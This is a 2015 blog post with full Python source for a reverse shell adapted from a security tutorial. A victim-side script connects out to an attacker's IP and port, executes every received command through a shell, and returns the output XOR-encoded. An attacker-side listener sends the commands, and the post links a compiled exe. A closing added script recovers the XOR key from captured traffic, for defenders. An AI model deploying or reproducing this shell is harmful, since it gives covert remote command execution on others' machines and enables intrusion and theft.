Monday, June 1, 2015

Python Reverse Shell - Modified from Primal Security Blog (Updated June 5)

The following Python reverse shell is taken from the Primal Security Blog located at the following link:  http://www.primalsecurity.net/0x2-python-tutorial-reverse-shell/

I modified the code so that the XOR value, port and IP address can be set as command line arguments on the server, or entered at the prompts on the client.  As long as the XOR value on the client and the server match, the commands will run properly.  The bytearray XOR technique I used comes from the information at the following blog: http://dabeaz.blogspot.com/2010/01/few-useful-bytearray-tricks.html

Server Code (Victim):
#!/usr/bin/python

import socket,subprocess,sys

if len(sys.argv) == 4:
    RHOST = sys.argv[1]
    RPORT = sys.argv[2]
    xorkey = sys.argv[3]
    xorkey = int(xorkey)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((RHOST, int(RPORT)))

    while True:
        # receive XOR encoded data from network socket
        data = s.recv(1024)
        # XOR the data again with the same key to get back to normal data
        en_data = bytearray(data)
        en_data = bytearray(x ^ xorkey for x in en_data)

        # Execute the decoded data as a command.  The subprocess module is great because we can PIPE STDOUT/STDERR/STDIN to a variable
        comm = subprocess.Popen(str(en_data), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        STDOUT, STDERR = comm.communicate()

        # Encode the output and send to RHOST
        if STDOUT:
            en_STDOUT = bytearray(STDOUT)
            en_STDOUT = bytearray(x ^ xorkey for x in en_STDOUT)
            s.send(en_STDOUT)
        else:
            en_STDOUT = bytearray("Invalid command...")
            en_STDOUT = bytearray(x ^ xorkey for x in en_STDOUT)
            s.send(en_STDOUT)
    s.close()

else:
    print "Example usage: ./prog   "
    print "The xor key is an integer from 0 to 256"

Client Code (Attacker):
#!/usr/bin/python

import socket
import time

# TCP Reverse Shell using Python
# Adapted from http://www.primalsecurity.net/0x2-python-tutorial-reverse-shell/

# Gather IP Address to Bind to
ipAddr = raw_input('Input Listening IP Address: ')
portNum = raw_input('Input Listening Port: ')
xorkey = raw_input('XOR Key (0-256): ')
xorkey = int(xorkey)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((ipAddr, int(portNum)))
s.listen(2)
print "Listening on port " + portNum + "..."
(client, (ip, port)) = s.accept()
print "Received connection from: " + ip

while True:
    command = raw_input('~$ ')
    if len(command) > 1:
        # XOR the command with the shared key before sending it
        encode = bytearray(command)
        encode = bytearray(x ^ xorkey for x in encode)
        client.send(encode)
        outputReceived = ''
        while 1:
            # Read the XOR encoded output; a short read marks the end of the output
            en_data = client.recv(1024)
            if len(en_data) < 1024:
                decode = bytearray(en_data)
                decode = bytearray(x ^ xorkey for x in decode)
                outputReceived += decode
                break
            else:
                decode = bytearray(en_data)
                decode = bytearray(x ^ xorkey for x in decode)
                outputReceived += decode
        print outputReceived

client.close()
s.close()

The code for the client and server, and an exe compiled with pyinstaller, can be found on my Google Drive at the following link.
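Because both ends XOR every byte with the same single integer, the "encoding" gives no real confidentiality: an analyst holding a capture of this traffic can brute-force all 256 keys offline. The following Python 3 script is an added defender-side example, not code from the post; the captured samples in it are constructed, and the server's fixed "Invalid command..." reply is used as known plaintext.

```python
#!/usr/bin/env python3
"""Recover the single-byte XOR key from a captured stream of the shell above.

Added example (not the post's code). A key that reveals the server's fixed
"Invalid command..." reply wins outright; otherwise the key whose output
looks most like text (lowercase letters, spaces, newlines) is chosen.
"""
import string

CRIB = b"Invalid command..."              # fixed reply from the post's server
TEXTY = set(b"\n " + string.ascii_lowercase.encode())
PRINTABLE = set(string.printable.encode())

def xor_bytes(data: bytes, key: int) -> bytes:
    """The single-byte XOR that the post's client and server both apply."""
    return bytes(b ^ key for b in data)

def text_score(data: bytes) -> float:
    """Text-likeness in [-1, 1]: rewards lowercase/space/newline bytes and
    penalises non-printable ones."""
    if not data:
        return -1.0
    good = sum(b in TEXTY for b in data)
    bad = sum(b not in PRINTABLE for b in data)
    return (good - bad) / len(data)

def recover_key(captured: bytes, min_score: float = 0.5):
    """Return the most plausible key, or None if no key decodes cleanly."""
    best_key, best_score = None, min_score
    for key in range(256):
        plain = xor_bytes(captured, key)
        if CRIB in plain:
            return key                    # known plaintext: unambiguous
        score = text_score(plain)
        if score > best_score:
            best_key, best_score = key, score
    return best_key

# Constructed samples: what the server would send back for `id` (key 0x41)
# and for a command that produced no stdout (key 0x7a).
SAMPLE_ID = xor_bytes(b"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n", 0x41)
SAMPLE_ERR = xor_bytes(CRIB, 0x7a)

if __name__ == "__main__":
    for blob in (SAMPLE_ID, SAMPLE_ERR):
        key = recover_key(blob)
        print("key=%#04x" % key, xor_bytes(blob, key).decode())
```

On real captures, feed the script the reassembled TCP payload of one direction of the connection; the crib path only fires on server-to-client data.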
